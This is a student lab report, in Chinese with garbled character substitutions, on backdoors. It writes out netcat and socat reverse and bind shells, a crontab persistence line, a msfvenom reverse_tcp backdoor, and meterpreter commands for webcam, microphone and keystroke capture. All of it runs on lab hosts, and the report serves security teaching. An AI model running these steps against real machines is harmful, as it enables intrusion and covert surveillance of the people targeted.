20155205 郝博雅 Exp2 后门原理与实践

20155205 郝博雅 Exp2 后门原理与实践

1、基础问题回答

后门（木马）

• 专用程序
• 投放
• 隐藏（免杀）
• 启动（自启动、绑定）

(1)例举你能想到的一个后门进入到你系统中的可能方式？

答：上学期信息安全技术作过一个实验：经过"挂马"网站主页中的 < iframe > 代码连接一个网址（即一个网页木马），在用户访问此网站时，使用户主机自动访问网页木马。网页木马在获得用户链接后，自动发送安装程序给用户。若是用户主机存在MS06014漏洞，则自动下载木马安装程序并在后台运行。还有多是别人u盘携带了木马，不当心插到本身电脑上就凉凉了。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

答：在以前实验中，后门是能够把本身的名字改为相似于xindows自身可执行文件的，这样windows就没法发现有木马，而后木马会自动链接服务器启动。还有一种是相似于钓鱼网站同样，你觉得点的是普通的页面，实际上是假装后的后门。

(3)Meterpreter有哪些给你映像深入的功能？

答：监控摄像头让我感受很可怕，由于以前看到过不少家庭摄像头被控制的案例，没想到本身也能监控别人的摄像头（虽然比较低级），但这个真的让我更加提升了安全意识。

(4)如何发现本身有系统有没有被安装后门？

答：上学期上娄老师的课时学了pid，当时搜到一种方法：经过netstat -anltp命令可查看到当前链接信息及创建链接的进程pid，kill掉可疑链接的进程，且已知进程pid能够执行ls -al /proc/pid值，经过exe对应位置找到后门文件路径。

2、实验准备

Windows得到Linux Shell

• 在win里使用ipconfig查看本机的IP地址

• 在win中，输入ncat.exe -l -p 5205监听本机5205端口
• 在kali下，输入nc 172.30.7.113 5205 -e /bin/sh(使用nc指令的-e选项反向链接Windows主机的5205端口)
• 能够看到win下成功得到kali的shell

Linux得到Windows Shell

• 在kali中查看虚拟机的IP地址

• 这两步和上面的同样，只不过把地址改为了kali的，并且是win反向链接kali

• kali得到win的shell：

使用nc传输数据

• win输入ncat.exe -l 5205监听端口
• kali输入nc 172.30.7.113链接到端口
• 这样就能够传输数据了：

3、实验内容

『使用netcat获取主机操做Shell，cron启动 』

• 在win下输入ncat.exe -l -p 5205监听本机5205端口
• 查看crontab的帮助文档，知道crontab指令能够用于设置周期性被执行的指令。
• 使用crontab -e指令编辑一条定时任务
• 在最后一行添加45 * * * * /bin/netcat 172.30.7.113 5205 -e /bin/sh,在每一个小时的第45分钟反向链接Windows主机的5205端口
• 时间到了45分时，得到了kali的shell，能够看到第一行显示了以前我输入但由于时间没到没有显示的lslsls。

『使用socat获取主机操做Shell, 任务计划启动 』

• 在Windows系统下，打开控制面板->管理工具->任务计划程序，建立任务，填写任务名称后，新建一个触发器

• 在操做->程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5215 exec:cmd.exe,pty,stderr，这个命令的做用是把cmd.exe绑定到端口5205，同时把cmd.exe的stderr重定向到stdout上：
• 建立完成后手动运行任务

• 在kali下输入socat - tcp:172.30.7.113:5205即可得到win的shell：

『使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell 』

• 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.114 LPORT=5205 -f exe > 20155205_backdoor.exe生成后门程序：

• 将生成的后门程序传送到windows主机上
• 在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置ip地址和端口

• 执行监听，这时要在win中打开后门程序

『使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 』

• 使用record_mic指令能够截获一段音频：

• 使用webcam_snap指令可使用摄像头进行拍照：

• 使用webcam stream指令可使用摄像头进行录像：

• 使用screenshot指令能够进行截屏：

• 使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录：

4、收获

答：首先我知道了，NAT（本身的虚拟机联）和桥接（本身与别人联，必须得在一个网）的不一样，这回终于能把虚拟机ping通了。在进行各类监听的过程当中，个人安全防范意识逐步加强，并且我知道了别人是怎么攻击个人，以后我就知道如何来防范不良分子。此次的实验颇有趣，收获很大😄